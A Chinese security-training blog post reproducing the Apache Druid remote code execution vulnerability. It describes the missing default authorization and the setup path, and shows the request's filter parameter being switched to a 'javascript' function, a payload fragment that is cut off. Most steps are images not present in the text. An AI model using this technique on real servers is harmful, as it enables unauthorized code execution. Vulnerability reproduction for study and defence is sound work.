雨笋教育:Apache Druid CVE命令执行漏洞复现!

2021-06-23 7,503

雨笋教育小编又来分享渗透技术文干货了,这次来复盘一次Apache Druid CVE漏洞。

Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。

自行搭建测试环境

1.jpg

复现流程

2.jpg

3.jpg

此处路径与文件填下面的值quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

4.jpg

抓包filter 参数{"type":"selector","dimension":"","value":""}}}

改成{"type": "javascript", "dimension": "added", "function": "function(value)

*本文章仅供技术交流分享,请勿做未授权违法攻击,雨笋教育不负任何责任。具体请参考《网络安全法》


本文作者:雨笋教育-丹丹

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/161292.html

Tags:
评论  (0)
快来写下你的想法吧!

雨笋教育-丹丹

文章数:7 积分: 40

国家网络安全教育培训实战基地,为各行业定制培养及输送实战型网络安全人才 获取学习资料:15386496074

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号